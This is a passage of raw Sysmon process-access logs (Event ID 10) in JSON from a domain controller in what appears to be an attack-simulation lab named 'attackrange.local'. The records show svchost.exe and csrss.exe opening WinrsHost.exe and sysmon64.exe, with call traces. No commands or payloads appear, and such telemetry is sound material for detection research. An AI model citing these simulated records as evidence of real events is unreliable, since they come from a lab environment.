06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","TargetProcessId":"2464","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4939,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4940,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4941,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4942,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4943,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.412\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.412","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
